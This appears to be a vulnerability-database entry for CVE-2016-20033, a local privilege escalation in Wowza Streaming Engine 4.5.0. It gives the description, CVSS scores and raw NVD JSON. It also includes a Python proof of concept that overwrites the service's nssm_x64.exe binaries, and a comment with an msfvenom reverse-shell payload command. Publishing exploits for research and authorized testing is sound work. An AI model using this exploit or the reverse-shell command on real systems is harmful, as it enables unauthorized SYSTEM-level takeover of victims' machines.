Security Vulnerability Report
中文
CVE-2016-20033 CVSS 7.8 HIGH

CVE-2016-20033

Published: 2026-03-16 14:17:50
Last Modified: 2026-03-19 14:16:04
Source: [email protected]

Description

Wowza Streaming Engine 4.5.0 contains a local privilege escalation vulnerability that allows authenticated users to escalate privileges by replacing executable files due to improper file permissions granting full access to the Everyone group. Attackers can replace the nssm_x64.exe binary in the manager and engine service directories with malicious executables to execute code with LocalSystem privileges when services restart.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wowza:streaming_engine:4.5.0:*:*:*:*:*:*:* - VULNERABLE
Wowza Streaming Engine 4.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2016-20033 PoC - Wowza Streaming Engine Local Privilege Escalation Note: This is for educational and authorized testing purposes only. """ import os import sys import shutil import subprocess import platform TARGET_PATHS = [ r"C:\Program Files\Wowza Streaming Engine\manager\bin\nssm_x64.exe", r"C:\Program Files\Wowza Streaming Engine\engine\bin\nssm_x64.exe" ] def check_vulnerability(): """Check if target system is vulnerable""" if platform.system() != "Windows": print("[-] This exploit requires a Windows target system") return False print("[*] Checking for vulnerable Wowza Streaming Engine installation...") for path in TARGET_PATHS: if os.path.exists(path): print(f"[+] Found vulnerable binary: {path}") # Check file permissions (simplified check) try: os.access(path, os.W_OK) print(f"[+] File is writable - system may be vulnerable") return True except: pass print("[-] No vulnerable files found") return False def create_malicious_binary(): """Generate malicious executable (placeholder)""" print("[*] Generating malicious nssm_x64.exe...") # In real attack, use: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > nssm_x64.exe malicious_binary = b'MZ' + b'\x00' * 100 # Placeholder return malicious_binary def exploit(): """Execute privilege escalation exploit""" if not check_vulnerability(): print("[-] Exploit cannot proceed - target not vulnerable") return False print("[*] Backing up original binaries...") backups = [] for path in TARGET_PATHS: if os.path.exists(path): backup_path = path + ".bak" shutil.copy2(path, backup_path) backups.append((path, backup_path)) print(f"[+] Backed up: {path}") print("[*] Creating malicious binary...") malicious_code = create_malicious_binary() print("[*] Replacing vulnerable binaries...") for path, _ in backups: try: with open(path, 'wb') as f: f.write(malicious_code) print(f"[+] Replaced: {path}") except PermissionError: print(f"[-] Permission denied: {path}") print("[*] Try running as administrator or waiting for service restart") return False print("[!] Binary replacement complete. Trigger service restart to execute payload.") print("[*] On next service restart, the malicious code will execute with LocalSystem privileges.") return True if __name__ == "__main__": print("CVE-2016-20033 - Wowza Streaming Engine Local Privilege Escalation") print("=" * 70) exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2016-20033", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:50.297", "lastModified": "2026-03-19T14:16:04.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wowza Streaming Engine 4.5.0 contains a local privilege escalation vulnerability that allows authenticated users to escalate privileges by replacing executable files due to improper file permissions granting full access to the Everyone group. Attackers can replace the nssm_x64.exe binary in the manager and engine service directories with malicious executables to execute code with LocalSystem privileges when services restart."}, {"lang": "es", "value": "Wowza Streaming Engine 4.5.0 contiene una vulnerabilidad de escalada de privilegios local que permite a los usuarios autenticados escalar privilegios reemplazando archivos ejecutables debido a permisos de archivo incorrectos que otorgan acceso total al grupo Everyone. Los atacantes pueden reemplazar el binario nssm_x64.exe en los directorios de servicio del administrador y del motor con ejecutables maliciosos para ejecutar código con privilegios de LocalSystem cuando los servicios se reinician."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wowza:streaming_engine:4.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "FDC6B630-F0E9-4F80-8EF2-112FAB0A46C2"}]}]}], "references": [{"url": "http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5339.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/40132", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/wowza-streaming-engine-local-privilege-escalation-via-nssm-x64-exe", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.